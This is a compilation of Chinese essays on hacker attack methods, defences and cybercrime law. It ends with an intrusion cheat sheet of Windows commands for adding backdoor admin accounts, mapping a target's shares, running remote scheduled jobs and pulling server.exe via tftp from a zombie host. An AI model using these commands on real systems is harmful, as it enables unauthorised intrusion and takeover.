黑客与网络安全(共8篇)
黑客与网络安全 篇1
计算机网络是现代通信技术与计算机技术相结合的产物。
人们的生活与网络密不可分,从而网络系统的安全、可靠性也成为用户最为关注的焦点。
而各类不安全因素中,又属黑客攻击最为棘手。
1 认识黑客
黑客(Hacker)指那些利用技术手段进入其权限以外计算机系统的人。
他们活跃在虚拟的网络世界里,他们是真正的程序员,有过人的才能和乐此不疲的创造欲。
一般人们把他们称之为黑客(Hacker)或骇客(Cracker),前者更多指的是具有反传统精神的程序员,后者列多指的是利用工具功击别人的功击者,具有明显贬义。
但无论是黑客还是骇客,都是具备高超的计算机知识的人。
2 黑客的主要攻击手段
2.1 口令入侵
所谓口令入侵是指使用某些合法用户的账号和口令登录到目的主机,然后再实施功击活动。
使用这种方法的前提是必须先得到该主机上的某个合法用户的帐号,然后再进行合法用户口令的皮译。
在UNIX操作系统中,用户的基本信息都存放在passwd文件中,而所有口令则经过DES加密方法加密后专门存放在一个叫shadow的文件中。
黑客们获取口令文件后,就会使用专门的破解DES加密法的程序来破解口令。
2.2 放置特洛伊木马程序
特洛伊木马程序一般分为服务器端(Server)和客户端(Client)。
特洛伊木马(Trojans)程序常被伪装成工具程序或游戏,一旦用户打开了带有特洛伊木马程序的邮件附件或从网上直接下载,或执行了这些程序之后,当你连接到互联网上时,这个程序就会通知黑客用户的IP地址及被预先设定的端口。
黑客在收到这些资料后,再利用这个潜伏其中的程序,就可以恣意修改用户的计算机设定、复制任何文件、窥探用户整个硬盘内的资料。
2.3 DOS攻击
造成DOS(Denial of Service,拒绝服务)的攻击行为被称为DOS攻击,其目的是使计算机或网络无法提供正常的服务。
最常见的DOS攻击有计算机网络带宽攻击和连通性攻击。
带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求无法通过。
连通性攻击是指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终使计算机无法再处理用户的请求。
2.4 端口扫描
所谓端口扫描,就是利用Socket编程与目标主机的某些端口建立TCP连接、进行传输协议的验证等,从而侦知目标主机的扫描端口是否处于激活状态、主机提供了哪些服务、提供的服务中是否含有某些缺陷等等。
常用的扫描方式有TCP connect扫描、TCP FIN扫描、IP段扫描和FTP返回攻击等。
2.5 网络监听
网络监听,在网络安全上一直是一个比较敏感的话题,作为一种发展比较成熟的技术,监听在协助网络管理员监测网络传输数据、排除网络故障等方面具有不可替代的作用,因而一直倍受网络管理员的青睐。
然而,在另一方面网络监听也给以太网的安全带来了极大的隐患,许多的网络入侵往往都伴随着以太网内的网络监听行为上,从而造成口令失窃,敏感数据被截取等等连锁性安全事件。
2.6 欺骗攻击
欺骗攻击是攻击者创造一个易于误解的上下文环境,以诱使受攻击者进入并且做出缺乏安全考虑的.决策。
欺骗攻击就像是一场虚拟游戏:攻击者在受攻击者的周围建立起一个错误但是令人信服的世界。
常见的欺骗攻击有:Web欺骗、ARP欺骗、IP欺骗。
3 网络安全防护的一般措施
3.1 物理安全
物理安全可以分为两个方面:一是人为对网络的损害;二是网络对使用者的危害。
最常见的是施工人员由于对地下电缆不了解,从而造成电缆的破坏,这种情况可通过立标志牌加以防范;未采用结构化布线的网络经常会出现使用者对电缆的损坏,这就需要尽量采用结构化布线来安装网络;人为或自然灾害的影响,需在规划设计时加以考虑。
3.2 数据加密安全
数据加密技术是对系统中所有存储和传输的数据进行加密,使之成为密文,这样攻击者在截获到数据后,就无法了解到数据的内容;而只有被授权者才能接收和对该数据予以解答,以了解其内容,从而有效地保护了系统信息资源的安全。
数据加密技术包括这样几方面内容:数据加密、数据解密、数字签名、签名识别以及数字证明等。
数据加密技术对防范网络中的信息被窃取起到了极其重要的作用。
3.3 漏洞扫描及修复
漏洞扫描是对电脑进行全方位的扫描,检查当前的系统是否有漏洞,如果有漏洞则需要马上进行修复,否则电脑很容易受到网络的伤害甚至被黑客借助于电脑的漏洞进行远程控制。
所以漏洞扫描对于保护电脑和上网安全是必不可少的,而且需要每星期就进行一次扫描,一旦发现有漏洞就要马上修复,有的漏洞系统自身就可以修复,而有些则需要手动修复。
[参考文献]
[1]赵黎.黑客技术与网络安全[J].《计算机与数字工程》.第2期.
[2]胡义军.对付计算机黑客的网络安全对策[J].《中国高新技术企业》.第5期.
网络安全与黑客攻防【2】
摘要:随着网络的发展,网络安全问题已经成为一个被人们强烈关注的热点。
而其中黑客攻击所造成的安全问题是很重要的一个方面。
本文将介绍网络安全面临的主要威胁,重点分析黑客攻击的一般步骤,使用的手段,以及解决应对的最新方法手段。
关键词:网络安全 威胁 黑客 入侵步骤 原理 对策
因特网的迅猛发展给人们的生活带来了极大的方便,但同时因特网也面临着空前的威胁。
因此,如何使用有效可行的方法使网络危险降到人们可接受的范围之内越来越受到人们的关注。
1 网络安全基础
网络安全(Network Security)是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性科学。
从内容上看,网络安全包括以下4个方面的内容:网络实体安全、软件安全、数据安全、安全管理等。
2 网络安全面临的主要威胁
黑客与网络安全 篇2
由于早期网络协议对安全问题的忽视, 以及在使用和管理上的无序状态, 网络安全受到严重的威胁, 安全事故屡有发生。网络安全是对网络信息保密性、完整性和网络系统的可用性的保护, 影响网络安全的因素主要包括网络信息的无序性、计算机病毒、黑客入侵和信息污染等, 而其中黑客攻击是最棘手的难题。针对病毒防范, 大多网络用户都会采取两个方面的保护与防范:一是在思想上重视、管理上到位, 二是依靠防病毒软件。这两者是缺一不可的。相对来说, 网络用户对于黑客攻击的防范显得有点力不从心, 对黑客入侵的手段防不胜防, 常常在不知不觉中的状态下受到攻击, 当然带来的损失也是惨重的, 常常是亡羊补牢, 为时已晚。因此, 认真研究当今黑客入侵的手段及其相应的防范对策, 为计算机网络用户提供安全很有必要。网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全, 即硬件平台、操作系统、应用软件; 运行服务安全, 即保证服务的连续性、高效率。信息安全则主要是指数据安全, 包括数据加密、备份、程序等。目前, 大多数计算机使用的操作系统WinNT、Win2000等 都几乎存在安全漏洞 (Bugs) , 其中某些是操作系统或应用软件自带的, 这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏, 除非将网线拔掉;还有一些漏洞是系统管理员配置错误引起的, 如在网络文件系统中, 将目录和文件以可写方式调出, 将未加Shadow 的用户密码以明码方式存放在某一目录之下, 给黑客带来可乘之机, 使黑客任意修改、删除数据库中的参数设定或有关数据、复制文件、非法窥视服务器中的数据, 从而达到破坏的目的。
2黑客的攻击原理
(1) 拒绝服务攻击。
拒绝服务 (Denial of Service, DoS) 攻击是一种利用TCP/IP协议的弱点和系统存在的漏洞, 对网络设备进行攻击的行为。它以消耗网络带宽和系统资源为目的, 对网络服务器发送大量“请求”信息, 造成网络或服务器系统不堪重负, 致使系统瘫痪而无法提供正常的网络服务。拒绝服务攻击的典型方法是SYN Flood 类型的攻击。
(2) 恶意程序攻击。
黑客在收集信息的过程中利用Trace Route 程序, SNMP等一些公开的协议或工具收集驻留在网络系统中的各个主机系统的相关信息, 然后会探测目标网络上的每台主机, 利用一些特殊的数据包传送给目标主机, 使其做出相对应的响应, 由于每种操作系统的响应时间和方式都是不一样的, 黑客利用这种特征把得到的结果与准备好的数据库中的资料相对照, 从中便可轻而易举地判断出目标主机操作系统所用的版本及其他相关信息, 尤其是对于某些系统, 互联网上已发布了其安全漏洞所在, 但用户由于不懂或一时疏忽未下载并安装网上发布的该系统的“补丁”程序, 那么黑客就可以自己编写一段程序进入到该系统进行破坏。还有一些黑客准备了后门程序, 即进入到目标系统后为方便下一次入侵而安装在被攻击计算机系统内的一些程序, 为该计算机埋下了无穷无尽的隐患, 给用户造成了不可预测的损失。
(3) 欺骗攻击。
每一台计算机都有一个IP 地址, 登录时服务器可以根据这个IP 地址来判断来访者的身份。TCP/IP 协议是用IP 地址来作为网络节点的惟一标识, 因此攻击者可以在一定范围内直接修改节点的IP地址, 冒充某个可信节点的IP 地址进行攻击, 欺骗攻击就是一种利用假IP 地址骗取服务器的信任, 实现非法登录的入侵方法。
(4) 对用户名和密码进行攻击。
此种攻击方式大致分为三种情况, 一是对源代码的攻击, 对于网站来说, 由于ASP 的方便易用, 越来越多的网站后台程序都使用ASP 脚本语言。但是, 由于ASP 本身存在一些安全漏洞, 稍不小心就会给黑客提供可乘之机。用户名与口令往往是黑客们最感兴趣的东西, 如果被通过某种方式看到源代码, 后果是严重的。第二种攻击的方法就是监听, 用户输入的密码需要从用户端传送到服务器端进行系统对其的校验, 黑客能在两端之间进行数据监听。一般系统在传送密码时都进行了加密处理, 即黑客所得到的数据中不会存在明文的密码, 因此, 这种手法一般运用于局域网, 一旦成功, 攻击者将会得到很大的操作权益。第三是解密, 就是使用穷举法对已知用户名的密码进行解密。这种解密软件对尝试所有可能字符所组成的密码, 这种方法十分耗时, 但在密码设置简单的情况下却比较容易得手。
3对策
(1) 利用防火墙来阻止网络攻击。
防火墙 ( Firewall) 是在计算机和Internet 提供屏障的程序或设备, 可以通过配置合理的防火墙来防止网络黑客的攻击事件发生。防火墙还可以被用来隔离局域网中的计算机, 以免受来自Internet 的威胁。如果到达防火墙的数据包不满足所指定的条件, 那么防火墙就阻止这些数据包进入局域网, 但防火墙对于已授权的连接却是透明的。所有的内外连接都强制性地经过这一保护层接受检查过滤, 只有被授权的通信才允许通过。“防火墙”的安全意义是双向的, 一方面可以限制外部网对内部网的访问;另一方面也可以限制内部网对外部网中不健康或敏感信息的访问。同时, “防火墙”还可以对网络存取访问进行记录和统计, 对可疑动作报警, 以及提供网络是否受到监视和攻击的详细信息。防火墙系统的实现技术一般分为2 种, 一种是分组过滤技术;一种是代理服务技术。分组过滤基于路由器技术, 其机理是由分组过滤路由器对IP 分组进行选择, 根据特定组织机构的网络安全准则过滤掉某些IP 地址分组, 从而保护内部网络。代理服务技术是由一个高层应用网关作为代理服务器, 对于任何外部网的应用连接请求首先进行安全检查, 然后再与被保护网络应用服务器连接。代理服务技术可使内、外网络信息流动受到双向监控。
(2) 加强教育和宣传。
黑客的攻击之所以能经常得逞, 其主要原因就是人们思想麻痹, 没有正视黑客入侵所造成的严重后果。人们经常在有意无意之中就泄露了信息, 这些就为黑客开了方便之门。因此要大力宣传计算机病毒的危害, 要宣传可行的预防病毒的措施, 使大家提高警惕。要普及计算机软件的基本知识, 使人们了解病毒入侵计算机的原理和感染方法, 以便及早发现, 及早清除。特别对未成年人, 应从小培养网络用户的合法上网概念, 防止有害信息的传播和渗透。另外, 对工作人员应结合机房、硬件、软件、数据和网络等各方面的安全问题, 进行安全教育, 提高工作人员的保密观念和责任心;加强业务、技术的培训, 提高操作技能;教育工作人员严格遵守操作规程和各项保密规定, 防止人为事故的发生。
(3) 建立、健全法律和管理制度。
加强网络立法, 健全信息安全法规体系。网络信息安全的防范是一项复杂的系统工程, 它不仅是一个技术问题, 更应该属于法律范畴的问题。单纯的技术防范很难完全保证网络信息的安全, 建立完善的信息安全法规体系是保证网络信息安全的基石, 只有不断制定和完善法规体系, 才能做到有法可依、有法必依、执法必严、违法必究, 才能更好维护网络安全。
应建立一个实时有效的安全管理机构, 这个系统不仅接收来自IDS、防火墙与安全文件发出的警告信息, 以及路由器等设备的报告, 还能实时地收集操作系统以及应用程序的日志文件, 提取与安全有关的文件, 并对数据进行规范化处理, 更主要的是要对各处收集来的数据进行实时关联, 这些安全事件数据的相关性能使主管部门知道问题的所在, 迅速地做出正确的反应, 把网络信息遭受的损失减小到最低限度, 从而确保实现网络信息的安全。在建立起具有权威性的信息安全管理机构后, 进一步制定健全的管理制度, 最大限度地避免别有用心的人利用网络的漏洞, 恶意攻击网络。
摘要:在今天的信息时代, 计算机网络的应用已经涉及到了社会的方方面面, 人们的生活与网络密不可分, 从而网络系统的安全、可靠性也成为用户最为关注的焦点。而各类不安全因素中, 又属黑客攻击最为棘手, 认真研究当今黑客入侵的手段及其相应的防范对策, 对计算机网络用户提供安全是很有必要的, 对黑客常用的攻击手段进行了较为全面地剖析, 并提出了防范黑客的一些可行性措施。
关键词:网络安全,黑客,防范技术
参考文献
[1]王力.谈网络黑客的攻击与防火墙的保护[J].电脑知识与技术, 2008, (6) .
电脑黑客与网络保护 篇3
在给人们带来诸多方便的同时,电脑网络也成为犯罪分子攻击的重要目标,由于网络的无国界性,犯罪的结果不仅会干扰人们正常的经济生活或给企业造成巨大的损失,而且还会使政府信誉下降,国家安全受到威胁。难怪有人惊叹:网络是一把高悬在人们头顶上的双刃剑,成为摆在人们面前的一个沉重话题,迫使世人探索网络保护的方法。
横冲直撞的黑客
电脑黑客在网络中较为常见。黑客英文字母是HACKER,他们常常以计算机为工具,又以计算机为攻击目标,在网络上,对计算机信息功能进行删除、增加、修改、窃取、干扰,或传播病毒,从而造成网络信息系统不能正常运行。
2007年3月,中国中央电视台公布一起网络犯罪案,黑客制作“熊猫烧香”病毒,致使电脑网络感染上病毒而无法正常运转。仅2005年一年,中国计算机网络信息系统的病毒感染率为80%,全年暴发病毒数量达7.28万个,2006年的数字比这还大。
2006年7月11日,美国国务院发言人南希·贝克对媒体表示,美国国务院在华盛顿的总部和其他地区的电脑系统在近一个月时间内接连遭到大规模黑客攻击,多个办公室工作处于瘫痪状态。神秘黑客盗走不少“敏感情报”,还大胆在一些未加密的政府电脑上设置了“后门”,方便以后随意进入。2006年,中国业内人士透露并经官方证实,中国遭受黑客袭击的用户已由2004年的3%猛增到9%。
2003年12月5日,湖北省黄冈市市民陈某非法侵入团风县政府网站“中国团风”,申请注册域名为V0d.haoviso.com的“好易搜”网站。2004年5月,陈某将“好易搜”建成电影网站,先后录入电影353部,并与112个电影网站链接。经鉴定,“好易搜”网站传播淫秽色情电影,仅2004年6月11日至15日4天时间,“好易搜”点击数就高达43058人(次)。据统计,2005年,中国有9100多个网站被恶意篡改,其中政府网站达2027个,2006年1月,又有391个政府网站被恶意篡改。
2000年9月,25岁的罗马尼亚黑客哈拉普,侵入纽约一家网络公司的电脑系统,破解并下载了公司所有客户的信用卡号码,然后以此向公司勒索。业内人士称。如果哈拉普公布这些机密文件,这家公司将破产。另一份统计资料显示,2006年,中国仅“网络盗窃”就达数百万起,而真正破获的寥寥无几。
电脑黑客横冲直撞,使政府声誉受到损害,良好的社会风气受到亵渎,国家、集体、个人的财产受到损失,成为影响和谐社会构建的不容忽视因素。电脑黑客无孔不入的犯罪,严峻地摆在世人面前。
网络犯罪低龄化
网络带给人们快捷工作、学习、生活的同时,犯罪的低龄化,恐怕连美国的比尔·盖茨也不曾想到。
最早的网络犯罪是1981年LANMURPHY和他的3个朋友“访问”政府的文档文件。之后,网络犯罪率一直呈上升趋势,防备甚严、经济较发达的日本出现的网络犯罪5年间竟翻了8倍,与此同时,犯罪分子的平均年龄反而下降。
1994年,入侵美国空军基地秘密地下室、代号为“牧童”的黑客,在五角大楼的电脑网络里如入无人之境,不仅破译了密码,而且偷走了许多秘密文件,甚至可以发布军事命令。这名黑客当时是英国伦敦一个16岁学音乐的孩子,他的真名叫理查德·帕赖西。据美国官方透露,仅五角大楼军用电脑网络,一年就要遭受25万次的黑客攻击。为保护这一系统免被入侵,需要投入40余亿美元的防御成本。值得注意的是,发动进攻的这些黑客的年龄大多在15岁一18岁之间。
在我国,电脑犯罪的低龄化也开始进入人们的视线。1998年3月,上海一信托投资公司证券业务部的电脑网络3次被黑客袭击,拷贝、复制了客户账户、资金余额等明细资料。侵入该网络的黑客名叫章重华,其入侵的目的是帮助炒股被套的朋友“解套”。当时章重华只有18岁。据了解,侵入一个县政府网站、盗用政府网站传播淫秽物品的黑客陈某、孙某、李某,也都是被称作“早晨8、9点钟太阳”的青少年。
网络保护如何实现
对网络的保护,不外乎防、打两种手段。对此,世人设想了种种方案,归纳起来大致有三种。
一是强化网络自身保护,设立多重防盗密码。目前,在电脑网络中,大多设立了用于防击黑客侵入的密码。但这种密码只有一个,根据数学概率,总有可能找到一偶然机会把这个密码破译。于是世人根据防盗门原理,设想设立多个类似于多重防盗门的网络密码,提高保密系数,黑客即使破译第一个防盗门,倘若打不开第二个、第三个、第X个防盗门,则无法进入网络系统,从而起到保护网络信息的作用。但设计多重性防止黑客进入的密码,需要进行较复杂的技术处理,随着科技的发展,这个设想是会实现的。
二是建立一支网上警察部队。持这种观点的人认为,网络犯罪主体往往是高技术人才,一般执法人员侦破此类案件难度较大,加之网络犯罪的隐匿性、流动性较大,迫切需要组建一支具有高科技水平的网上警察队伍保护网络安全。网上警察可以在网上跨国界、跨地域协同作战,一旦获取网络犯罪证据,国际网络警察就可以在本地域将其抓获。但网上警察的综合素质要求较高,就目前我国综合国力和科技现状看,短时间内很难培养出一支由集各方面知识于一体的全才人员组成的网上警察部队。看来,第二种方案短时间内很不易做到。
三是尽快出台《网络安全法》。随着网络技术性、基础性、空间性作用日益增强,以网络为基础的一系列网络犯罪问题的出现对传统法律和法学理论提出了新的挑战。
西安交通大学教授马民虎认为,基于网络安全威胁的不可逆特点,需要尽快出台《网络保障法》,其法律对策直指预防、控制安全风险的客观需求,以程序保障为重点,使惩治网络犯罪有法可依,而不是牵强附会地引用现行法律。马民虎还提出政府网络安全监管权力配置应当坚持政府主导地位,建立政府与社会合作的法律对策。
2007年3月召开的十届全国人大五次会议上,全国人大代表张学东提出,虽然全国人大常委会于2000年12月28日通过了《关于维护互联网安全的决定》,但就我国网络犯罪规范体系而言,尚有一些补充、修改、完善的必要,加之我国缺乏健全惩治网络犯罪法律体系,为此,相关法律又往往过于概括与客观,可操作性不强,难以对网络犯罪形成真正的制度化的打击与防范。
出台一部新《网络安全法》,使防有所依,打有所据,打防结合,扼制或杜绝网络犯罪,这既是依法治国的需要,也是构建和谐社会不可缺少的一个方面。
权利和义务
随着网络的飞速发展,传统的法律已不能适用于网络安全,法律能在何种程度上保障网络安全,如何界定保护网络安全的公权力结构,这些已成为国人关心的法律问题。针对这一形势和现状,加强对网络安全法律保障刻不容缓。赶早不赶晚。法是教育、约束公民、法人和其他组织行为的规范。立法尽管是一项复杂的社会系统工程,但有法可依总比无法可依强。由于网络问题是时代发展中的一个新问题,没有经验可借鉴。因此,网络立法不能苛求尽善尽美,遇到新的问题,可以通过解释等手段予以完善。
作为构建和谐社会的重要保障,《网络安全法》不能不直面当前网络使用中出现的新问题,而解决这些新问题,也是衡量和比较各种网络行为利益的过程。在立法界定网络权利义务之时,首先确立和落实科学发展观,着眼促进和谐社会的构建和人类的发展,尽可能明示什么可做,什么不可做。逾越规范的制裁方法、方式,增加网络法律的可操作性。
依法治国是社会主义法治理念的核心,“有法可依,有法必依,执法必严,违法必究”是依法治国的体现。但社会主义法律的统一,也是依法治国中立法的一个不可忽视方面。制定《网络安全法》,需要注意与《刑法》、《民法》、《行政处罚法》等法律的有机结合。如我国《民法》规定“未满14周岁的人是无民事行为能力人”,《刑法》规定“未满14周岁的人是完全不负刑事责任的人”,而低龄化网络犯罪已经是一个突出问题,倘若有一天一未满14周岁的“神童”侵入国家网络“机密库”,窃取并无意中公示秘密,造成国家安全或国家利益巨大损失。是否负法律责任?如何处理,这些都需要在网络立法中明示,尽可能保持《网络安全法》与现行法律的相互统一。
从单纯惩治传统的“计算机犯罪”一旦扩大到惩治“网络犯罪”,同时将犯罪范围的解释从“国家事务、国防建设、科学技术领域”,扩大到“经济建设、公共信息服务领域”,将单纯的国家保护扩大到像《物权法》一样,给予公有和私有所有网络用户以同样的法律保护。
网络正冲击社会和全球的家庭,促使社会矛盾加剧,家庭面临种种危机,造成如网络恋爱、网络成瘾症、网络寡妇、网络孤儿等相继出现。但人类总是在不断战胜自我和改造自我中发展的,尤其随着保护网络安全法律的出台和逐步完善,我国的网络明天一定更美好。
浅析黑客常用攻击方法与防范措施 篇4
[摘 要]本文首先介绍了网络黑客的定义与起源,其次说明了网络上黑客攻击常用的九种方法,最后简要论述了防范黑客攻击应注意的一些问题。
[关键词]黑客 网络 攻击方法
一、什么是黑客
“黑客”一词有很多定义,大部分定义都涉及高超的编程技术,强烈的解决问题和克服限制的欲望。一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。直到后来,少数怀着不良的企图,利用非法手段获得的系统访问权去闯入远程机器系统、破坏重要数据,或为了自己的私利而制造麻烦的具有恶意行为特征的人慢慢玷污了“黑客”的名声,“黑客”才逐渐演变成入侵者、破坏者的`代名词。
目前黑客已成为一个特殊的社会群体。在欧美等国有不少完全合法的黑客组织,他们在因特网上利用自己的网站介绍黑客攻击手段、免费提供各种黑客工具软件、出版网上黑客杂志,甚至经常召开黑客技术交流会。这使得普通人也很容易下载并学会使用一些简单的黑客手段或工具对网络进行某种程度的攻击,进一步恶化了网络安全环境。
二、黑客常用的攻击方法
我们来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解了他们的常用攻击手段,我们才能采取准确的对策应对这些黑客。
1.获取口令。获取口令有三种方法:一是通过网络监听非法得到用户口令;二是在知道用户的账号后,利用一些专门软件强行破解用户口令;三是在获得一个服务器上的用户口令文件后,用暴力破解程序破解用户口令。
2.放置特洛伊木马程序。特洛伊木马程序可以直接侵入用户的电脑并进行破坏。它常被伪装成工具程序或者游戏等,一旦用户打开了这些程序,它们就会在计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。
3.WWW的欺骗技术。在网上用户可以利用各种浏览器访问WEB站点,如阅读新闻、咨询产品价格、订阅报纸、电子商务等等。然而如果黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。
4.电子邮件攻击。电子邮件攻击主要表现为两种方式:一是电子邮件轰炸,它是指用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”。二是电子邮件欺骗,攻击者佯称自己为系统管理员,给用户发送邮件要求用户修改口令或在貌似正常的附件中加载病毒或其他木马程序。
5.通过一个节点来攻击其他节点。黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机。他们可以使用网络监听方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。
6.网络监听。网络监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具就可以轻而易举地截取包括口令和帐号在内的信息资料。
7.寻找系统漏洞。许多系统都有这样那样的安全漏洞,其中某些是操作系统或应用软件本身具有的,在补丁未被开发出来之前一般很难防御黑客的破坏;还有一些漏洞是由于系统管理员配置错误引起的,这都会给黑客带来可乘之机,应及时加以修正。
8.利用帐号进行攻击。有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户,有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。
9.偷取特权。利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个网络的绝对控制权。
三、防范措施
1.经常做telnet、ftp等需要传送口令的重要机密信息应用的主机应该单独设立一个网段,以避免某一台个人机被攻破,造成整个网段通信全部暴露。
2.专用主机只开专用功能。网管网段路由器中的访问控制应该限制在最小限度,关闭所有不必要的端口。网络配置原则是“用户权限最小化”,关闭不必要或者不了解的网络服务,不用电子邮件寄送密码。
3.对用户开放的各个主机的日志文件全部定向到一个系统日志服务器上,集中管理。该服务器可以由一台拥有大容量存贮设备主机承当。定期检查系统日志文件,在备份设备上及时备份。制定完整的系统备份计划,并严格实施。
4.设立专门机器使用ftp或WWW从互联网上下载工具和资料,提供电子邮件、WWW、DNS的主机不安装任何开发工具,避免攻击者编译攻击程序。
5.下载安装最新的操作系统及其它应用软件的安全和升级补丁,安装几种必要的安全加强工具,限制对主机的访问,加强日志记录,对系统进行完整性检查,定期检查用户的脆弱口令,并通知用户尽快修改。
黑客cmd命令 篇5
net user heibai lovechina /add 加一个heibai的用户密码为lovechina
net localgroup Administrators heibai /add 把他加入Administrator组
net start telnet 开对方的TELNET服务
net use z:127。0。0。1c$ 映射对方的C盘
net use ipipc$ “ ” /user:“ ” 建立IPC空链接
net use ipipc$ “密码” /user:“用户名” 建立IPC非空链接
net use h: ipc$ “密码” /user:“用户名” 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net user guest /active:yes 将Guest用户激活
net user guest lovechina 把guest的密码改为lovechina
net user 用户名 / 删掉用户
net user guest/time:m—f,08:00—17:00 表示guest用户登录时间为周一至周 五的net user guest/time:m,4am—5pm;t,1pm—3pm;w—f,8:00—17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00。
net user guest/time:all表示没有时间限制。
net user guest/time 表示guest用户永远不能登录。 但是只能限制登陆时间,不是上网时间
net time 127。0。0。1 得到对方的时间,
get c:index。htm d: 上传的文件是INDEX。HTM,它位于C:下,传到对方D:
copy index。htm 127。0。0。1c$index。htm 本地C盘下的index。htm复制到127。0。0。1的C盘
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip “文本信息” 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat —a 查看开启了哪些端口,常用netstat —an
netstat —n 查看端口的网络连接情况,常用netstat —an
netstat —v 查看正在进行的工作
netstat —p 协议名 例:netstat —p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat —s 查看正在使用的所有协议使用情况
nbtsta* —* ** 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)—注意:参数—A要大写
tracert —参数 ip(或计算机名) 跟踪路由(数据包),参数:“—w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“—l[空格]数据包大小”;“—n发送数据次数”;“—t”指一直ping。
ping —t —l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist —t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill —F 进程名 加—F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del —F 文件名 加—F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A—R、/A—H、/A—S、/A—A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *。*”表示删除当前目录下所有只读文件,“DEL/A—S *。*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one。txt two。txt >3st。txt 对比二个文件并把不同之处输出到3st。txt文件中,“>”和“>>” 是重定向命令
at id号 开启已注册的某个计划任务
at / 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 / 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv。exe $“>ipadmin$ 复制本地c:srv。exe到对方的admin下
cppy 1st。jpg/b+2st。txt/a 3st。jpg 将2st。txt的内容藏身到1st。jpg中生成3st。jpg新的文件,注:2st。txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy $svv。exe”>ipadmin$svv。exe c: 或:copyipadmin$*。* 复制对方admini$共享下的srv。exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp —i 自己IP(用肉机作跳板时这用肉机IP) get server。exe c:server。exe 登陆后,将“IP”的server。exe下载到目标主机c:server。exe 参数:—i指以二进制模式传送,如传送exe文件时用,如不加—i 则以ASCII模式(传送文本文件模式)进行传送
tftp —i 对方IP put c:server。exe 登陆后,上传本地c:server。exe至主机
